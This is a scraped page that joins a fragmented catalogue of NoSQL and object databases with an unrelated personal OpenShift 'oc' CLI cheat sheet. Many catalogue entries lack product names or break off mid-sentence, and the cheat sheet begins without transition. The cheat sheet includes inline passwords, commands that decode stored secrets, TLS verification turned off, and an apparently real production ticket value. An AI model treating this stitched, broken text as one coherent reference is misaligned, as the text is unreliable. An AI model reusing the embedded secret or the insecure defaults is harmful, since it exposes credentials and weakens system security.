CortexDB is a dynamic schema-less multi-model data base providing nearly all advantages of up to now known NoSQL data base types (key-value store, document store, graph DB, multi-value DB, column DB) with dynamic re-organization during continuous operations, managing analytical and transaction data for agile software configuration,change requests on the fly, self service and low footprint.

Oracle NoSQL Database is a distributed key-value database with support for JSON docs. It is designed to provide highly reliable, scalable and available data storage across a configurable set of systems that function as storage nodes. NoSQL and the Enterprise Data is stored as key-value pairs, which are

  • written to particular storage node(s), based on the hashed value of the primary key. Storage nodes are replicated to ensure high availability, rapid failover in the event of a node failure and optimal load balancing of queries.
  • API: Java/C, Python, NodeJs, C#.

GraphDB + RDBMS + KV Store + Document Store. Alchemy Database is a low-latency high-TPS NewSQL RDBMS embedded in the NOSQL datastore redis. Extensive datastore-side-scripting is provided via deeply embedded Lua. Bought and integrated with Aerospike.

  • API:JDBC,SQL;
  • WonderDB is fully transactional, distributed NewSQL database implemented in java based on relational architectures. So you can get best of both worlds, sql, joins and ease of use from SQL and distribution,
  • replication and sharding from NoSQL movement. Tested performance is over 60K per node with Amazon m3.xlarge VM.

A new concept to ‘NoSQL’ databases where a memory allocator and a transactional database are melted together into an almost seamless whole. The programming model uses variants of well-known memory allocation calls like ‘new’ and ‘delete’ to manage the database. The result is very fast, natural to use, reliable and scalable. It is especially good in Big Data, data collection, embedded, high performance, Internet of Things (IoT) or mobile type applications.

  • API: Languages/
  • Protocol: Java, C#, C++, Python. Schema: language class model (easy changable). Modes: always consistent and eventually consistent
  • Replication: synchronous fault tolerant and peer to peer asynchronous.
  • Concurrency: optimistic and object based locks. Scaling: can add physical nodes on fly for scale out/in and migrate objects between nodes without impact to application code.
  • Misc: MapReduce via parallel SQL like query across logical database groupings.
  • API: Java, C#, .Net Langs,
  • Protocol: language,
  • Query Method: QBE (by Example), Soda, Native Queries, LINQ (.NET),
  • Replication: db4o2db4o & dRS to relationals,
  • Written in: Java, Cuncurrency: ACID serialized,
  • Misc: embedded lib, Links: DZone Refcard #53 », Book »,
  • API: Languages: Java, C#, C++, Python, Smalltalk, SQL access through ODBC. Schema: native language class model, direct support for references, interoperable across all language bindings. 64 bit unique object ID (OID) supports multi exa-byte. Platforms: 32 and 64 bit Windows, Linux, Mac OSX, *Unix. Modes: always consistent (ACID).
  • Concurrency: locks at cluster of objects (container) level. Scaling: unique distributed architecture, dynamic addition/removal of clients & servers, cloud environment ready.
  • Replication: synchronous with quorum fault tolerant across peer to peer partitions.
  • API: Java, C, C++, Smalltalk Schema: language class model Platforms: Linux, AIX, Solaris, Mac OSX, Windows clients Modes: always consistent (ACID)
  • Replication: shared page cache per node, hot standby failover
  • Concurrency: optimistic and object based locks Scaling: arbitrarily large number of nodes
  • Misc: SQL via GemConnect
  • API: C# (.NET languages), Schema: Native language class model,
  • Query method: SQL,
  • Concurrency: Fully ACID compliant, Storage: In-memory with transactions secured on disk, Reliability: Full checkpoint recovery,
  • Misc: VMDBMS - Integrating the DBMS with the virtual machine for maximal performance and ease of use.
  • API: Java,Java ME,C#,Mono.
  • Query method: OO via Perst collections, QBE, Native Queries, LINQ, native full-text search, JSQL
  • Replication: Async+sync (master-slave)
  • Written in: Java, C#. Caching: Object cache (LRU, weak, strong), page pool, in-memory database
  • Concurrency: Pessimistic+optimistic (MVCC) + async or sync (ACID) Index types: Many tree models + Time Series.
  • Misc: Embedded lib., encryption, automatic recovery, native full text search, on-line or off-line backup.
  • Written in100% pure C#,
  • Concurrency: ACID/transactional, pessimistic/optimistic locking,
  • Misc: compact data, B-tree indexes, LINQ queries, 64bit object identifiers (Oid) supporting multi millions of databases and high performance. Deploy with a single DLL of around 400KB.
  • Written in: 100% C#, The HSS DB v3.0 (HighSpeed-Solutions Database), is a client based, zero-configuration, auto schema evolution, acid/transactional, LINQ Query, DBMS for Microsoft .NET 4/4.5, Windows 8 (Windows Runtime), Windows Phone 7.5/8, Silverlight 5, MonoTouch for iPhone and Mono for Android
  • API: Python,
  • Protocol: Internal, ZEO,
  • Query Method: Direct object access, zope.catalog, gocept.objectquery,
  • Replication: ZEO, ZEORAID, RelStorage
  • Written in: Python, C
  • Concurrency: MVCC, License: Zope Public License (OSI approved)
  • Misc: Used in production since 1998

Newt DB leverages the pluggable storage layer of ZODB to use RelStorage to store data in Postgres. Newt adds conversion of data from the native serialization used by ZODB to JSON, stored in a Postgres JSONB column. The JSON data supplements the native data to support indexing, search, and access from non-Python applications. It adds a search API for searching the Postgres JSON data and returning persistent objects.

  • Query Method: Postgres SQL, ZODB API,
  • Replication: Postgres, ZEO, ZEORAID, RelStorage,
  • Written in: Python,
  • Concurrency: MVCC, License: MIT
  • API: Python - ZODB "Storage" interface,
  • Protocol: native,
  • Query Method: transactional key-value,
  • Replication: native,
  • Written in: Python,
  • Concurrency: MVCC (internally), License: GPL "v2 or later",
  • Misc: Load balancing, fault tolerant, hot-extensible.

Smalltalk DB, optimistic locking, Transactions, etc.

An object database engine that currently runs on .NET, Mono, Silverlight,Windows Phone 7, MonoTouch, MonoAndroid, CompactFramework; It has implemented a Sync Framework Provider and can be synchronized with MS SQLServer;

  • Query method:LINQ;

Programming Language with an Object Database build in. Around since 1996.

is a lightweight object-oriented database for .NET with support for Silverlight and Windows Phone 7. It features in-memory keys and indexes, triggers, and support for compressing and encrypting the underlying data.

An embedded object database designed for mobile apps targetting .net and Mono runtimes. Supports .net/mono, Xamarin (iOS and Android), Windows 8.1/10, Windows Phone 8.1. Simple API, built on top of json.net and has a simple but effective indexing mechanism. Development is focussed on being lightweight and developer friendly. Has transaction support. Open-source and free to use.

Stores .NET classes in a datapool. Build for speed. SQL Server integration. LINQ support.

EyeDB is an LGPL OODBMS, provides an advanced object model (inheritance, collections, arrays, methods, triggers, constraints, reflexivity), an object definition language based on ODMG ODL, an object query and manipulation language based on ODMG OQL. Programming interfaces for C++ and Java.

Object-Oriented Database designed to support the maintenance and sharing of knowledge bases. Optimized for pointer-intensive data structures used by semantic networks, frame systems, and many intelligent agent applications.

  • Written in: ANSI C.

Ninja Database Pro is a .NET ACID compliant relational object database that supports transactions, indexes, encryption, and compression. It currently runs on .NET Desktop Applications, Silverlight Applications, and Windows Phone 7 Applications.

  • API: C#, .Net, Mono, Windows Phone 7, Silverlight,
  • Protocol: language,
  • Query Method: Soda, LINQ (.NET),
  • Written in: C#,
  • Misc: embedded lib, indexes, triggers, handle circular ref, LinqPad support, Northwind sample, refactoring, in-memory database, Transactions Support (ACID)

Language and Object Database, can be viewed as a Database Development Framework. Schema: native language class model with relations + various indexes. Queries: language build in + a small Prolog like DSL Pilog.

  • Concurrency: synchronization + locks.
  • Replication, distribution and fault tolerance is not implemented per default but can be implemented with native functionality.
  • Written in C (32bit) or assembly (64bit).
  • API: Haskell,
  • Query Method: Functional programming,
  • Written in: Haskell,
  • Concurrency: ACID, GHC concurrent runtime,
  • Misc: In-memory with disk-based log, supports remote access
  • Links: Wiki », Docs »
  • API: Java (JPA / JDO)
  • Query method: JPA JPQL, JDO JDOQL
  • Replication: Master-slave
  • Written in: 100% Pure Java Caching: Object cache, Data cache, Page cache, Query Result cache, Query program cache
  • Concurrency: Object level locking (pessimistic + optimistic) Index types: BTree, single, path, collection
  • Misc: Used in production since 2004, Embedded mode, Client Server mode, automatic recovery, on-line backup.

CoreObject: Version-controlled OODB, that supports powerful undo, semantic merging, and real-time collaborative editing. MIT-licensed,

  • API: ObjC, Schema: EMOF-like,
  • Concurrency: ACID,
  • Replication: differential sync,
  • Misc: DVCS based on object graph diffs, selective undo, refs accross versioned docs, tagging, temporal indexing, integrity checking.

Grid & Cloud Database Solutions

In-Memory Computing Platform built on Apache® Ignite™ to provide high-speed transactions with ACID guarantees, real-time streaming, and fast analytics in a single, comprehensive data access and processing layer. The distributed in-memory key value store is ANSI SQL-99 compliant with support for SQL and DML via JDBC or ODBC.
API: Java, .NET, and C++. Minimal or no modifications to the application or database layers for architectures built on all popular RDBMS, NoSQL or Apache™ Hadoop® databases.

shared nothing, document-oriented cluster

  • data store. Accessed via SQL and has builtin BLOB support. Uses the cluster state implementation and node discovery of Elasticsearch. License: Apache 2.0,
  • Query Method: SQL, Clients: HTTP (REST), Python, Java (JDBC or native), Ruby, JS, Erlang,
  • Replication + Sharding: automatic and configurable,
  • written in: Java, » Crate Data GitHub Project, » Documentation.

Oracle Coherence offers distributed, replicated, multi-datacenter, tiered (off-heap/SSD) and near (client) caching. It provides distributed processing, querying, eventing, and map/reduce, session management, and prorogation of database updates to caches. Operational support provided by a Grid Archive deployment model.

Popular SpaceBased Grid Solution.

GemFire offers in-memory globally distributed data management with dynamic scalability, very high performance and granular control supporting the most demanding applications. Well integrated with the Spring Framework, developers can quickly and easily provide sophisticated data management for applications. With simple horizontal scale-out, data latency caused by network roundtrips and disk I/O can be avoided even as applications grow.

scalable, highly available data grid platform, open source,

  • written in Java.

NOSQL Data Integration Environment, can integrate relational, object, BigData – NOSQL easily and without any SQL.

Hazelcast is a in-memory data grid that offers distributed data in Java with dynamic scalability under the Apache 2 open source license. It provides distributed data structures in Java in a single Jar file including hashmaps, queues, locks, topics and an execution service that allows you to simply program these data structures as pure java objects, while benefitting from symmetric multiprocessing and cross-cluster shared elastic memory of very high ingest data streams and very high transactional loads.

? Coherence

? eXtremeScale

XML Databases

  • API: Java, XQuery,
  • Protocol: WebDAV, web services,
  • Query method: XQuery, XPath, XPointer,
  • Replication: lazy primary copy
  • replication (master/replicas),
  • Written in: Java,
  • Concurrency: concurrent reads, writes with lock; transaction isolation,
  • Misc: Fully transactional persistent DOM; versioning; multiple index types; metadata and non-XML data support; unlimited horizontal scaling
  • API: XQuery, XML:DB API, DOM, SAX,
  • Protocols: HTTP/REST, WebDAV, SOAP, XML-RPC, Atom,
  • Query Method: XQuery,
  • Written in: Java (open source),
  • Concurrency: Concurrent reads, lock on write;
  • Misc: Entire web applications can be
  • written in XQuery, using XSLT, XHTML, CSS, and Javascript (for AJAX functionality). (1.4) adds a new full text search index based on Apache Lucene, a lightweight URL rewriting and MVC framework, and support for XProc.
  • Misc: ACID transactions, security, indices, hot backup. Flexible XML processing facilities include W3C XQuery implementation, tight integration of XQuery with full-text search facilities and a node-level update language.

BaseX is a fast, powerful, lightweight XML database system and XPath/XQuery processor with highly conformant support for the latest W3C Update and Full Text Recommendations. Client/Server architecture, ACID transaction support, user management, logging, Open Source, BSD-license,

  • written in Java, runs out of the box.

commercial and open source version,

  • API: Java,
  • Protocols: HTTP, REST,
  • Query Method: XQuery, XQuery Full-Text, XQuery Update,
  • Written in: Java, full source can be purchased,
  • Concurrency: Concurrent reads & writes, isolation,
  • Misc: Terabyte scalable, emphasizes query speed.
  • API: Many languages,
  • Written in: C++,
  • Query Method: XQuery,
  • Replication: Master / Slave,
  • Concurrency: MVCC, License: Sleepycat

API: Java. The application and database management system in one. Collects data as multiple XML files on the disk. Implements facet-oriented data model. Each data object is considered as an universal facet container. The end-user can design and evolve data objects individually through the GUI without any coding by adding/removing facets to/from it.

Multidimensional Databases

by Intersystems, multidimensional array.Node.js API, array based APIs (Java / .NET), and a Java based document API.

Postrelational System. Multidimensional array APIs, Object APIs, Relational Support (Fully SQL capable JDBC, ODBC, etc.) and Document APIs are new in the upcoming 2012.2.x versions. Availible for Windows, Linux and OpenVMS.

  • API: M, C, Python, Perl,
  • Protocol: native, inprocess C,
  • Misc: Wrappers: M/DB for SimpleDB compatible HTTP
  • »,
  • MDB:X for XML »,
  • PIP for mapping to tables for SQL »,
  • Features: Small footprint (17MB),
  • Terabyte Scalability,
  • Unicode support,
  • Database encryption, Secure,
  • ACID transactions (single node),
  • eventual consistency ( replication)
  • Links: Slides »,

Array Data Model for Scientists, » HiScaBlog

: Multidimensional arrays,

  • API: M, C, Pascal, Perl, .NET, ActiveX, Java, WEB. Available for Windows and Linux.

: Short description: Rasdaman is a scientific database that allows to store and retrieve multi-dimensional raster data (arrays) of unlimited size through an SQL-style query language.

  • API: C++/Java,
  • Written in C++,
  • Query method: SQL-like query language rasql, as well as via OGC standards WCPS, WCS, WPS link2

is a new Realtime analytics database

  • written in .NET C#.
  • ACID compliant.
  • fluent .NET query API, Client / server or in-process.
  • In-memory and persistent mode.

Multivalue Databases

(UniVerse, UniData): MultiValue Databases, Data Structure: MultiValued, Supports nested entities, Virtual Metadata,

  • API: BASIC, InterCall, Socket, .NET and Java API's, IDE: Native, Record Oriented, Scalability: automatic table space allocation,
  • Protocol: Client Server, SOA, Terminal Line, X-OFF/X-ON,
  • Written in: C,
  • Query Method: Native mvQuery, (Retrieve/UniQuery) and SQL,
  • Replication: yes, Hot standby,
  • Concurrency: Record and File Locking (Fine and Coarse Granularity)
  • API: Basic+, .Net, COM, Socket, ODBC,
  • Protocol: TCP/IP, Named Pipes, Telnet, VT100. HTTP/S
  • Query Method: RList, SQL & XPath
  • Written in: Native 4GL, C, C++, Basic+, .Net, Java
  • Replication: Hot Standby
  • Concurrency: table &/or row locking, optionally transaction based & commit & rollback Data structure: Relational &/or MultiValue, supports nested entities Scalability: rows and tables size dynamically

D3, mvBase, mvEnterprise Data Structure: Dynamic multidimensional PICK data model, multi-valued, dictionary-driven,

  • API: NET, Java, PHP, C++,
  • Protocol: C/S,
  • Written In: C,
  • Query Method: AQL, SQL, ODBC, Pick/BASIC,
  • Replication: **Hot Backup, FFR, Transaction Logging + real-time
  • replication**,
  • Concurrency: Row Level Locking, Connectivity: OSFI, ODBC, Web-Services, Web-enabled, Security: File level AES-128 encryption

(Reality NPS): The original MultiValue dataset database, virtual machine, enquiry and rapid development environment. Delivers ultra efficiency, scalability and resilience while extended for the web and with built-in auto sizing, failsafe and more. Interoperability includes Web Services - Java Classes, RESTful, XML, ActiveX, Sockets, .NetLanguages, C and, for those interoperate with the world of SQL, ODBC/JDBC with two-way transparent SQL data access.

Supports nested data. Fully automated table space allocation.

  • Concurrency control via task locks, file locks & shareable/exclusive record locks. Case insensitivity option. Secondary key indices. Integrated data
  • replication. QMBasic programming language for rapid development. OO programming integrated into QMBasic. QMClient connectivity from Visual Basic, PowerBasic, Delphi, PureBasic, ASP, PHP, C and more. Extended multivalue query language.

A high performance dbms that runs on IBM mainframes (IBM z/OS, z/VM, zVSE), +SQL interface with nested entity support

  • API: native 4GL (SOUL + o-o support), SQL, Host Language (COBOL, Assembler, PL1) API, ODBC, JDBC, .net, Websphere MQ, Sockets Scalability: automatic table space allocation, 64-bit support
  • Written in: IBM assembler, C
  • Query method: SOUL, SQL, RCL ( invocation of native language from client )
  • Concurrency: record and file level locking Connectivity: TN3270, Telnet, Http

Hybrid database / search engine system with characteristics of multi-value, document, relational, XML and graph databases. Used in production since 1985 for high-performance search and retrieve solutions. Full-text search, text classification, similarity search, results ranking, real time facets, Unicode, Chinese word segmentation, and more. Platforms: Windows, Linux, AIX and Solaris.

  • API: .NET, Java and C/C++.
  • Query methods: native (CCL), SQL subset, XPath. Commercial.

(by Microsoft) ISAM storage technology. Access using index or cursor navigation. Denormalized schemas, wide tables with sparse columns, multi-valued columns, and sparse and rich indexes. C# and Delphi drivers available. Backend for a number of MS Products as Exchange.

jBASE is an application platform and database that allows normal MultiValue (MV) applications to become native Windows, Unix or Linux programs. Traditional MV features are supported, including BASIC, Proc, Paragraph, Query and Dictionaries. jBASE jEDI Architecture, allows you to store data in any database, such as Microsoft SQL, Oracle and DB2. jBASE jAgent supports BASIC, C, C++, .NET, Java and REST APIs. Additional features include dynamic objects, encryption, case insensitivity, audit logging and transaction journaling for online backup and disaster recovery.

Event Sourcing

  • Clean,
  • succinct Command/Event model,
  • Compact data storage layout,
  • Disruptor for fast message processing,
  • CQengine for fast indexing and querying,
  • In-memory and on-disk storage,
  • Causality-preserving Hybrid Logical Clocks,
  • Locking synchronization primitive,
  • OSGi support

Time Series / Streaming Databases

Distributed DB designed to store and analyze high-frequency time-series data at scale. Includes a large set of built-in features: Rule Engine, Visualization, Data Forecasting, Data Mining.

  • API: RESTful API, Network API, Data API, Meta API, SQL API Clients: R, Java, Ruby, Python, PHP, Node.js
  • Replication: Master Slave Major protocol & format support: CSV, nmon, pickle, StatsD, collectd, tcollector, scollector, JMX, JDBC, SNMP, JSON, ICMP, OVPM, SOAP.

time-series database optimized for Big Data analytics.

very high-performance time series database. Highly scalable.

  • API: C, C++, Java, Python and (limited) RESTful
  • Protocol: binary
  • Query method: API/SQL-like,
  • Replication: Distributed,
  • Written in: C++ 11/Assembly,
  • Concurrency: ACID,
  • Misc: built-in data compression, native support for FreeBSD, Linux and Windows. License: Commercial.

Enterprise-grade NoSQL time series database optimized specifically for IoT and Time Series data. It ingests, transforms, stores, and analyzes massive amounts of time series data. Riak TS is engineered to be faster than Cassandra.

(listed also under other NoSQLrelated DBs)

Other NoSQL related databases

Type: Document Store,

  • API: Java, HTTP, IIOP, C API, REST Web Services, DXL, Languages: Java, JavaScript, LotusScript, C, @Formulas,
  • Protocol: HTTP, NRPC,
  • Replication: Master/Master,
  • Written in: C,
  • Concurrency: Eventually Consistent, Scaling:
  • Replication Clusters

Type: Hybrid In-Memory and/or Persistent Database Database;

  • Written in: C;
  • API: C/C++, SQL, JNI, C#(.NET), JDBC;
  • Replication: Async+sync (master-slave), Cluster; Scalability: 64-bit and MVCC

APIs: C++, Navigational C. Embedded Solution that is ACID Compliant with Multi-Core, On-Disk & In-Memory Support. Distributed Capabilities, Hot Online Backup, supports all Main Platforms. Supported B Tree & Hash Indexing.

  • Replication: Master/Slave,
  • Concurrency: MVCC. Client/Server: In-process/Built-in.

NoSql, in-memory, flat-file, cloud-based. API interfaces. Small data footprint and very fast data retrieval. Stores 200 million records with 200 attributes in just 10GB. Retrieves 150 million records per second per CPU core. Often used to visualize big data on maps.

  • Written in C.

Next-gen NoSQL encrypted document store. Multi-recipient / group encryption. Featuers:

  • concurrency, indices, ACID transactions,
  • replication and PKI management. Supports PHP and many others.
  • Written in C++. Commercial but has a free version.
  • API: JSON

Service oriented, schema-less, network data model DBMS. Client application invokes methods of vyhodb services, which are

  • written in Java and deployed inside vyhodb. Vyhodb services reads and modifies storage data.
  • API: Java,
  • Protocol: RSI - Remote service invocation,
  • Written in: Java, ACID: fully supported,
  • Replication: async master slave,
  • Misc: online backup, License: proprietary

Applied Calculus implements persistent AVL Trees / AVL Databases. 14 different types of databases - represented as classes in both C# and Java. These databases perform transaction logging on the node file to ensure that failed transactions are backed out. Very fast on solid state storage (ca. 1780 transactions/second. AVL Trees considerably outperform B+ Trees on solid state. Very natural language interface. Each database is represented as a collection class that strongly resembles the corresponding class in Pure Calculus.

Java RAM Data structure journalling.

Python wrapper over sqlite3

A database as a service that can be queried with a spreadsheet through an HTTP API.

Scientific and Specialized DBs

BayesDB, a Bayesian database table, lets users query the probable implications of their tabular data as easily as an SQL database lets them query the data itself. Using the built-in Bayesian Query Language (BQL), users with no statistics training can solve basic data science problems, such as detecting predictive relationships between variables, inferring missing values, simulating probable observations, and identifying statistically similar database entries.

A distributed database for many core devices. GPUdb leverages many core devices such as NVIDIA GPUs to provide an unparallelled parallel database experience. GPUdb is a scalable, distributed database with SQL-style query capability, capable of storing Big Data. Developers using the GPUdb API add data, and query the data with operations like select, group by, and join. GPUdb includes many operations not available in other "cloud database" offerings.

unresolved and uncategorized

moved to Meteor

key/index/tuple DB. Using Pages.

  • Written in: Ruby. github: »

GNU Tool for text files containing records and fields. Manual »

Mainly targeted to Silverlight/Windows Phone developers but its also great for any .NET application where a simple local database is required, extremely Lightweight - less than 50K, stores one table per file, including index, compiled versions for Windows Phone 7, Silverlight and .NET, fast, free to use in your applications

A digital brain, based on the language of thought (Mentalese), to manage relations and strategies (with thoughts/words/symbols) into a cognitive cerebral structure.

  • Programing language: MQL (Mentalese Query Language) for mental processes,
  • ACID transaction,
  • API: REST and web socket, Thoughts Performance: READ: 18035/s; WRITE: 416/s; Asynchronous Full JAVA
  • written in Python

illuminate Correlation Database »,

FluidDB (Column Oriented DB) »,

nosql list

Theory

NoSql NoSql BoltDB

OpenShift cheat sheet

other cheat sheets

links collections

Init

install client

oc cli installation debian

sudo apt install oc

or download appropriate release
or openshift downloads retrieve "browser_download_url", example of link for downloading ( from previous link )

https://github.com/openshift/origin/releases/download/v3.11.0/openshift-origin-client-tools-v3.11.0-0cbc58b-linux-64bit.tar.gz
tar -xvf openshift-origin-client-tools-v3.11.0-0cbc58b-linux-64bit.tar.gz
mv openshift-origin-client-tools-v3.11.0-0cbc58b-linux-64bit /home/soft/openshift-tool
export PATH=/home/soft/openshift-tool:$PATH

check oc client version oc

oc version -v8 2>&1 | grep "User-Agent" | awk '{print $6}

odo cli
tkn cli

completion

source <(oc completion bash)

trace logging communication, verbose output

rm -rf ~/.kube/cache
oc get pods -v=6
oc get pods -v=7
oc get pods -v=8
# 1..10
oc --loglevel 9 get pod

ocp output

oc get pods --no-headers
oc get pods -o json
oc get pods -o jsonpath={.metadata.name}
oc get dc -o jsonpath-as-json={.items[*].spec.template.spec.volumes[*].persistentVolumeClaim.claimName}

oc get pods -o yaml
oc get pods -o wide
oc get pods -o name

oc get pods -o custom-columns=NAME:.metadata.name,RSRC:.metadata.resourceVersion
# or data in file: template.txt
# NAME          RSRC
# metadata.name metadata.resourceVersion
oc get pods -o custom-columns-file=template.txt

REST api

print collaboration, output rest api call, print api calls

oc whoami -v=8

example of rest api collaboration, rest call

TOKEN=$(oc whoami -t)
ENDPOINT=$(oc status | head --lines=1 | awk '{print $6}')
NAMESPACE=$(oc status | head --lines=1 | awk '{print $3}')
echo $TOKEN
echo $ENDPOINT
echo $NAMESPACE
echo $NAME

curl -k -H "Authorization: Bearer $TOKEN" -H 'Accept: application/json' $ENDPOINT/api/v1/pods
curl -k -H "Authorization: Bearer $TOKEN" -H 'Accept: application/json' $ENDPOINT/api/v1/namespaces/$NAMESPACE/pods
# watch on changes
curl -k -H "Authorization: Bearer $TOKEN" -H 'Accept: application/json' $ENDPOINT/api/v1/watch/namespaces/$NAMESPACE/pods

Login

login into openshift

oc login --username=admin --password=admin
echo "my_password" | oc login -u my_user
oc login -u developer -p developer
oc login {url}

check login

oc whoami
# or 
oc status | grep "on server"

using token after login multiterminal communication

# obtain user's token
OCP_TOKEN=`oc whoami -t`

# apply token in another terminal/machine
oc whoami $OCP_TOKEN

login into openshift using token

https://oauth-openshift.stg.zxxp.zur/oauth/token/display

 oc login --token=sha256~xxxxxxxxxxxxx --server=https://api.stg.zxxp.zur:6443

switch contex, use another cluster

~/.kube/config

apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://localhost:6440
  name: docker-for-desktop-cluster   
- cluster:
    insecure-skip-tls-verify: true
    server: https://openshift-master-sim.myprovider.org:8443
  name: openshift-master-sim-myprovider-org:8443
kubectl config use-context kubernetes-admin@docker-for-desktop-cluster

check access to the namespace, to the resource

oc auth can-i update pods -n $NAME_OF_NAMESPACE

explain yaml schema

oc explain pods
oc explain pods --recursive
oc explain pods --recursive --api-version=autoscaling/v2beta1

get in yaml, get source of resource, describe yaml

oc get -o yaml  pod {name of the pod}
oc get -o json  pod {name of the pod}

oc get -o json  pod {name of the pod} --namespace one --namespace two --namespace three

secrets

create token for MapR

maprlogin password -user {mapruser}
# ticket-file will be created

check expiration date

maprlogin print -ticketfile /tmp/maprticket_1000 # or another filename

create secret from file

cat /tmp/maprticket_1000 
# create secret from file ( default name )
oc create secret generic {name of secret/token} --from-file=/tmp/maprticket_1000 -n {project name}
# create secret from file with specifying the name - CONTAINER_TICKET ( oc describe {name of secret} )
oc create secret generic {name of secret/token} --from-file=CONTAINER_TICKET=/tmp/maprticket_1000 -n {project name}

read secret get secret value

oc get secret $TICKET_NAME -o yaml | yq .data | awk '{print $2}' | base64 --decode

automation for creating tickets in diff namespaces

function openshift-replace-maprticket(){
    MAPR_TICKET_PATH="${1}"
    if [[ $MAPR_TICKET_PATH == "" ]]; then
        echo " first parameter should be filepath to MapR ticket PROD ! "
        return 1
    fi
    if [ ! -f $MAPR_TICKET_PATH ]; then
        echo "can't access file: ${MAPR_TICKET_PATH}"
        return 2
    fi
    oc login -u $TECH_USER -p $TECH_PASSWORD $OPEN_SHIFT_URL
    PROJECTS=("portal-pre-prod" "portal-production")
    SECRET_NAME="mapr-ticket"
    
    for OC_PROJECT in "${PROJECTS[@]}"
    do 
        echo $OC_PROJECT
        oc project $OC_PROJECT
        oc delete secret $SECRET_NAME
        oc create secret generic $SECRET_NAME --from-file=CONTAINER_TICKET=$MAPR_TICKET_PATH -n $OC_PROJECT
        oc get secret $SECRET_NAME -n $OC_PROJECT
    done
}

or from content of file from previous command

oc create secret generic {name of secret/token} --from-literal=CONTAINER_TICKET='dp.prod.ubs qEnHLE7UaW81NJaDehSH4HX+m9kcSg1UC5AzLO8HJTjhfJKrQWdHd82Aj0swwb3AsxLg==' -n {project name}

create secret values

login password secret

SECRET_NAME=my-secret
KEY1=user
VALUE1=cherkavi
KEY2=password
VALUE2=my-secret-password
oc create secret generic $SECRET_NAME --from-literal=$KEY1=$VALUE1 --from-literal=$KEY2=$VALUE2

or even mix of them

oc create secret generic $SECRET_NAME --from-file=ssh-privatekey= /.ssh/id_rsa --from-literal=$KEY1=$VALUE1

check creation

oc get secrets
oc get secret metadata-api-token -o yaml | yq .data.METADATA_API_TOKEN | base64 --decode

secret mapping example, map secret

   ...
   volumeMounts:
          - name: mapr-ticket
            mountPath: "/path/inside/container"
            readOnly: true
...            
 volumes:
        - name: mapr-ticket
          secret:
            secretName: my-ticket

information about cluster

kubectl cluster-info

describe information about cluster

oc describe {[object type:](https://docs.openshift.com/enterprise/3.0/cli_reference/basic_cli_operations.html#object-types)}
  • buildconfigs
  • services
  • routes
  • ...

take a look into all events, notification about changes, cluster messages, problem resolving

# follow events
oc get --watch events
# print events and sort them out by time
oc get events --sort-by='.lastTimestamp' | grep " Warning "
oc get pod $OCP_POD 
oc describe pod $OCP_POD
oc logs pod/$OCP_POD

show namespace, all applications, url to service, status of all services

oc status

show route to service, show url to application

oc get routes {app name / service name}
oc get route -demo hello-world-http -o jsonpath='{.spec.host}'

route migration

FILE_NAME=route-data-api-mdf4download-service.yaml
echo "vim $FILE_NAME" | clipboard
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.metadata.labels."template.openshift.io/template-instance-owner"),(.metadata.namespace="my_namespace")' $FILE_NAME 
{
  "haproxy.router.openshift.io/rate-limit-connections": "true",
  "haproxy.router.openshift.io/rate-limit-connections.concurrent-tcp": "70",
  "haproxy.router.openshift.io/rate-limit-connections.rate-http": "70",
  "haproxy.router.openshift.io/timeout": "1800s",
}
## doesn't work - 02
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/corsHeaders='Accept, Authorization, Content-Type, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, X-Requested-With'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/corsHeaders-

## doesn't work - 03
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response-headers='access-control-allow-credentials: true, access-control-allow-headers: X-Requested-By\, Authorization\, Content-Type, access-control-allow-methods: GET\, POST\, PUT\, DELETE, access-control-allow-origin: *'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response-headers-

## doesn't work - 04
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response_headers='access-control-allow-credentials: true, access-control-allow-headers: X-Requested-By\, Authorization\, Content-Type, access-control-allow-methods: GET\, POST\, PUT\, DELETE, access-control-allow-origin: *'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response_headers-

## doesn't work - 05
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/hsts_header='access-control-allow-credentials: true, access-control-allow-headers: X-Requested-By\, Authorization\, Content-Type, access-control-allow-methods: GET\, POST\, PUT\, DELETE, access-control-allow-origin: *'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/hsts_header-

## doesn't work - 06
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/enable-cors='true'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/enable-cors-

## doesn't work - 07
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-enable='true'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-credentials='true'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-headers='X-Requested-By, Authorization, Content-Type'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-methods='GET, POST, PUT, DELETE'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-origin='*'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-credentials-
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-headers-
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-methods-
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-origin-

## doesn't work 08
# haproxy.router.openshift.io/hsts_header: "cors-allow-origin='*';cors-allow-credentials='true';includeSubDomains;preload"

## doesn't work 09
# nginx.ingress.kubernetes.io/enable-cors: "true"
# nginx.ingress.kubernetes.io/cors-allow-origin: "*"

## doesn't work  - 10
# oc annotate route $ROUTE_NAME kubernetes.io/ingress.class="nginx"
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-credentials='true'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-headers='X-Requested-By, Authorization, Content-Type'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-methods='GET, POST, PUT, DELETE'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-origin='*'
# oc annotate route $ROUTE_NAME kubernetes.io/ingress.class-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-credentials-
